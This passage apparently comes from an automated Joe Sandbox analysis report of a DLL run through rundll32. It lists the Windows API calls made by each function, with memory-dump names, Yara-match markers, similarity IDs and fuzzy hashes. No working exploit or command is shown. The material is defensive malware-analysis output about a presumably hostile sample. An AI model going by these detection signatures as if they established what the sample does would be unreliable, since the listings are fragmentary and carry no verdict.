                                                                                                                                                              • Part of subcall function 10020495: GlobalUnlock.KERNEL32(?,?,?,10014801,?,00000004,1000116F,?,?,1000113F), ref: 100204B2
                                                                                                                                                              • Part of subcall function 10020495: GlobalFree.KERNEL32(?), ref: 100204BD
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 168474834-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • GetSystemMetrics.USER32 ref: 10020F3B
                                                                                                                                                            • GetSystemMetrics.USER32 ref: 10020F42
                                                                                                                                                            • GetSystemMetrics.USER32 ref: 10020F49
                                                                                                                                                            • GetSystemMetrics.USER32 ref: 10020F53
                                                                                                                                                            • GetDC.USER32(00000000), ref: 10020F5D
                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 10020F6E
                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10020F76
                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 10020F7E
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MetricsSystem$CapsDevice$Release
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1151147025-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 10018224
                                                                                                                                                            • MapDialogRect.USER32(?,00000000), ref: 100182B5
                                                                                                                                                            • SysAllocStringLen.OLEAUT32(?,?), ref: 100182D4
                                                                                                                                                            • CLSIDFromString.OLE32(?,?), ref: 100183C6
                                                                                                                                                              • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                                                            • CLSIDFromProgID.OLE32(?,?), ref: 100183CE
                                                                                                                                                            • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 10018468
                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 100184BA
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: String$From$AllocDialogFreeH_prolog3ProgRectWindow_malloc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2841959276-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 10029D39
                                                                                                                                                            • _memset.LIBCMT ref: 10029DA5
                                                                                                                                                              • Part of subcall function 1002BDD9: _memset.LIBCMT ref: 1002BDE1
                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 10029DE5
                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 10029E66
                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 10029E75
                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 10029E84
                                                                                                                                                            • VariantClear.OLEAUT32(00000000), ref: 10029E99
                                                                                                                                                              • Part of subcall function 1002981B: __EH_prolog3.LIBCMT ref: 10029837
                                                                                                                                                              • Part of subcall function 1002981B: VariantClear.OLEAUT32(?), ref: 1002989C
                                                                                                                                                              • Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Variant$ClearFreeString$H_prolog3_memset$Copy
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2905758408-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FreeString$_memset$ClearH_prolog3Variant
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3574576181-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 1001658F
                                                                                                                                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1001664B
                                                                                                                                                            • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 10016662
                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 1001667C
                                                                                                                                                            • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 1001668E
                                                                                                                                                            Strings
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseEnumH_prolog3OpenQueryValue
                                                                                                                                                            • String ID: Software\
                                                                                                                                                            • API String ID: 3878845136-964853688
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • GetParent.USER32(?), ref: 1001AC38
                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AC5F
                                                                                                                                                            • UpdateWindow.USER32 ref: 1001AC79
                                                                                                                                                            • SendMessageA.USER32 ref: 1001AC9D
                                                                                                                                                            • SendMessageA.USER32 ref: 1001ACB7
                                                                                                                                                            • UpdateWindow.USER32 ref: 1001ACFD
                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AD31
                                                                                                                                                              • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2853195852-0
                                                                                                                                                            • Opcode ID: 8feb0ac7bae7ce442b8f735e4586b594c24fd72a806b3adb2c8abbd7d5165037
                                                                                                                                                            • Instruction ID: 2c496a546f4f3369c4007c2120619f6f6246382fa3c8875764faf214921a126d
                                                                                                                                                            • Opcode Fuzzy Hash: 8feb0ac7bae7ce442b8f735e4586b594c24fd72a806b3adb2c8abbd7d5165037
                                                                                                                                                            • Instruction Fuzzy Hash: CF419C306047419FD721DF218D84A1BBAE4FFC6B95F00092DF8829A5A1E772D9C4CA92
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MessageSend$ActiveCaptureFocusLastPopup
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3219385341-0
                                                                                                                                                            • Opcode ID: 0692041214081e2f36a8d4241324024d2ae50e87aeefd30631ef423bb921d550
                                                                                                                                                            • Instruction ID: 62284d7f9b5d477bd881e5ff36e2f7527576b9e0115aa241cae08abffcb520cf
                                                                                                                                                            • Opcode Fuzzy Hash: 0692041214081e2f36a8d4241324024d2ae50e87aeefd30631ef423bb921d550
                                                                                                                                                            • Instruction Fuzzy Hash: B2314975301315EFDA11DB64ECC4D6F7AEEEB866C1B530469F840DB112DB31EC8196A2
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • GetWindow.USER32(?,00000002), ref: 1002A21B
                                                                                                                                                            • GetParent.USER32(?), ref: 1002A22C
                                                                                                                                                            • GetWindow.USER32(?,00000002), ref: 1002A24F
                                                                                                                                                            • GetWindow.USER32(?,00000002), ref: 1002A261
                                                                                                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 1002A270
                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 1002A28A
                                                                                                                                                            • GetTopWindow.USER32(?), ref: 1002A2B0
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Window$LongParentVisible
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 506644340-0
                                                                                                                                                            • Opcode ID: 4c680b8172efdff4f43197e84ba51ed07d499ac862c14e8ee8a7a782e640ae8a
                                                                                                                                                            • Instruction ID: 0686fc7eee0d828e519c8ddef4b664d273c3d3866c12363d81ce6f3f8585b441
                                                                                                                                                            • Opcode Fuzzy Hash: 4c680b8172efdff4f43197e84ba51ed07d499ac862c14e8ee8a7a782e640ae8a
                                                                                                                                                            • Instruction Fuzzy Hash: 8D219532A00B25EBD621EBB99C49F1B76DCFF8A790F810514F991EB152DF26EC848750
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 10032AB8
                                                                                                                                                            • __calloc_crt.LIBCMT ref: 10032AC4
                                                                                                                                                            • CreateThread.KERNEL32(00000002,?,V&',00000000,?,1001623D), ref: 10032B08
                                                                                                                                                            • GetLastError.KERNEL32(?,1001623D,?,?,100160A8,?,00000002,00000030,?,00000000), ref: 10032B12
                                                                                                                                                            • __dosmaperr.LIBCMT ref: 10032B2A
                                                                                                                                                              • Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4
                                                                                                                                                              • Part of subcall function 10037753: __decode_pointer.LIBCMT ref: 1003775C
                                                                                                                                                            Strings
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd_noexit
                                                                                                                                                            • String ID: V&'
                                                                                                                                                            • API String ID: 1067611704-802299783
                                                                                                                                                            • Opcode ID: 7692696f047afdf50ec9d72e30f89faf206a335569b9867b5efcd1348c4cc88e
                                                                                                                                                            • Instruction ID: 55a26fe1f49629ebb029cc0f5307a0876855c5a2f29d8e6ee061ec31c14b4724
                                                                                                                                                            • Opcode Fuzzy Hash: 7692696f047afdf50ec9d72e30f89faf206a335569b9867b5efcd1348c4cc88e
                                                                                                                                                            • Instruction Fuzzy Hash: 28112376505205EFDB02EFA4DC8288FBBE8FF08366F210429F501DA061EB31A910CBA1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 10016C9F: _memset.LIBCMT ref: 10016CB6
                                                                                                                                                            • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013DA
                                                                                                                                                            • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013EC
                                                                                                                                                            • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013FE
                                                                                                                                                            • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001410
                                                                                                                                                            • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001422
                                                                                                                                                            • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001446
                                                                                                                                                            • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001458
                                                                                                                                                              • Part of subcall function 100136C0: LoadIconA.USER32 ref: 100136D2
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ProcessorVirtual$Concurrency::RootRoot::$IconLoad_memset
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2004563703-0
                                                                                                                                                            • Opcode ID: 6dfda32c90deb5612abc77854e0b58487ec939f19a89b76ccee82452222fe2ce
                                                                                                                                                            • Instruction ID: cb42d3b07606be4c321c66a21cc03232491b7df8b22d3b1298026f5f2f4788d5
                                                                                                                                                            • Opcode Fuzzy Hash: 6dfda32c90deb5612abc77854e0b58487ec939f19a89b76ccee82452222fe2ce
                                                                                                                                                            • Instruction Fuzzy Hash: 1A216DB4904299EBDB04CBA8C951BAEBB75FF05704F148558E4516B3C2CB79AA00CB65
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10017660
                                                                                                                                                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10017683
                                                                                                                                                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1001769F
                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 100176AF
                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 100176B9
                                                                                                                                                            Strings
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseCreate$Open
                                                                                                                                                            • String ID: software
                                                                                                                                                            • API String ID: 1740278721-2010147023
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • ~_Task_impl.LIBCPMT ref: 100011B6
                                                                                                                                                              • Part of subcall function 10018A6F: __EH_prolog3.LIBCMT ref: 10018A76
                                                                                                                                                            • ~_Task_impl.LIBCPMT ref: 100011C8
                                                                                                                                                            • ~_Task_impl.LIBCPMT ref: 100011EC
                                                                                                                                                              • Part of subcall function 10018AC4: __EH_prolog3.LIBCMT ref: 10018ACB
                                                                                                                                                            • ~_Task_impl.LIBCPMT ref: 100011FE
                                                                                                                                                            • ~_Task_impl.LIBCPMT ref: 10001210
                                                                                                                                                            • ~_Task_impl.LIBCPMT ref: 10001222
                                                                                                                                                            • ~_Task_impl.LIBCPMT ref: 10001231
                                                                                                                                                              • Part of subcall function 10018662: __EH_prolog3.LIBCMT ref: 10018669
                                                                                                                                                              • Part of subcall function 10016C14: __EH_prolog3.LIBCMT ref: 10016C1B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Task_impl$H_prolog3
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1204490572-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 10020A95
                                                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 10020A9F
                                                                                                                                                              • Part of subcall function 10033135: RaiseException.KERNEL32(?,?,?,?), ref: 10033175
                                                                                                                                                            • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004), ref: 10020AB6
                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3
                                                                                                                                                              • Part of subcall function 100201BD: __CxxThrowException@8.LIBCMT ref: 100201D1
                                                                                                                                                            • _memset.LIBCMT ref: 10020AE2
                                                                                                                                                            • TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 356813703-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Color$Brush
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2798902688-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 10029837
                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 1002989C
                                                                                                                                                              • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 10029AAB
                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 10029B1D
                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 10029D0E
                                                                                                                                                              • Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7
                                                                                                                                                              • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                                                              • Part of subcall function 1002C06F: __EH_prolog3.LIBCMT ref: 1002C079
                                                                                                                                                              • Part of subcall function 1002C06F: lstrlenA.KERNEL32(?,00000224,10029CDA,?,00000008,00000000,?,000000CC), ref: 1002C098
                                                                                                                                                              • Part of subcall function 1002C06F: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 1002C0A0
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Variant$Clear$H_prolog3$AllocAllocatorByteCopyDebugException@8HeapStringThrowlstrlen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 63617653-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3_catch_GS.LIBCMT ref: 1002D1F0
                                                                                                                                                            • lstrlenA.KERNEL32(00000000,000000FF,00000050,10022221,00000000,00000001,?,?,000000FF,?,?,?), ref: 1002D222
                                                                                                                                                              • Part of subcall function 10017790: _memcpy_s.LIBCMT ref: 100177A0
                                                                                                                                                            • _memset.LIBCMT ref: 1002D2F2
                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 1002D3D1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4021759052-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • _memset.LIBCMT ref: 1002D5FF
                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 1002D650
                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 1002D674
                                                                                                                                                              • Part of subcall function 100200B9: __EH_prolog3.LIBCMT ref: 100200C0
                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 1002D6CC
                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 1002D6F5
                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 1002D724
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocString$H_prolog3_memset
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 842698744-0
                                                                                                                                                            • Opcode ID: 508acb920ccba7a207f47e88a798d4189b9ed575a01c86aa1581d938c190cd50
                                                                                                                                                            • Instruction ID: 4ca028c9b4d427f08f2d669533113988f62624cee2fc7606aac8abf48e723189
                                                                                                                                                            • Opcode Fuzzy Hash: 508acb920ccba7a207f47e88a798d4189b9ed575a01c86aa1581d938c190cd50
                                                                                                                                                            • Instruction Fuzzy Hash: E9414A34900304CFDB24EFB8D891AADB7B5EF04314F50852EF9659B2A2DB74A854CF55
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 10016936: GetParent.USER32(100010EC), ref: 10016989
                                                                                                                                                              • Part of subcall function 10016936: GetLastActivePopup.USER32(100010EC), ref: 10016998
                                                                                                                                                              • Part of subcall function 10016936: IsWindowEnabled.USER32(100010EC), ref: 100169AD
                                                                                                                                                              • Part of subcall function 10016936: EnableWindow.USER32(100010EC,00000000), ref: 100169C0
                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 10016A2E
                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 10016A3C
                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 10016A46
                                                                                                                                                            • SendMessageA.USER32 ref: 10016A5B
                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10016AD8
                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 10016B14
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1877664794-0
                                                                                                                                                            • Opcode ID: f56e269d1f7720d56fa1c58fd8a6d78852bfdb5100da494152acd8aedeab4fb9
                                                                                                                                                            • Instruction ID: f13ef48dc5fb0c484cec2fa7b3f992f2dc6d3b1b42596072abe369902371925a
                                                                                                                                                            • Opcode Fuzzy Hash: f56e269d1f7720d56fa1c58fd8a6d78852bfdb5100da494152acd8aedeab4fb9
